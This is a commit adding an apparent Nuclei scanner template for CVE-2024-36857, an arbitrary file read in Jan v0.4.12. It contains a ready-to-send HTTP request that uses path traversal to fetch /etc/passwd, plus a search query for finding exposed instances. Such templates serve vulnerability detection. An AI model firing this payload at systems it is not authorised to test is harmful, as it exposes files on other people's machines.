Create CVE-2024-36857.yaml

2026-01-31 15:53:33 +08:00 · 2025-05-22 00:11:37 +05:30
parent b90c3599bf
commit 775950ad19
1 changed files with 48 additions and 0 deletions
--- a/http/cves/2024/CVE-2024-36857.yaml
+++ b/http/cves/2024/CVE-2024-36857.yaml
@@ -0,0 +1,48 @@
+id: CVE-2024-36857
+
+info:
+  name: Jan v0.4.12 - File Read
+  author: pussycat0x
+  severity: high
+  description: |
+    Jan v0.4.12 was discovered to contain an arbitrary file read vulnerability via the /v1/app/readFileSync interface.
+  reference:
+    - https://github.com/HackAllSec/CVEs/blob/main/Jan%20AFR%20vulnerability/README.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-36857
+    epss-score: 0.00273
+    epss-percentile: 0.50483
+    cpe: cpe:2.3:a:homebrew:jan:0.4.12:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    fofa-query: icon_hash="-165268926"
+  tags: cve,cve2024,kev,jan,lfi
+
+http:
+  - raw:
+      - |
+        POST /v1/app/readFileSync HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+        Accept-Encoding: gzip, deflate, br
+        Referer: http://{{RootURL}}
+        contentType: application/json
+        Content-Type: text/plain;charset=UTF-8
+        Content-Length: 48
+        Origin: http://{{RootURL}}
+        Connection: close
+
+        ["file:/../../../../../../etc/passwd","utf-8"]
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200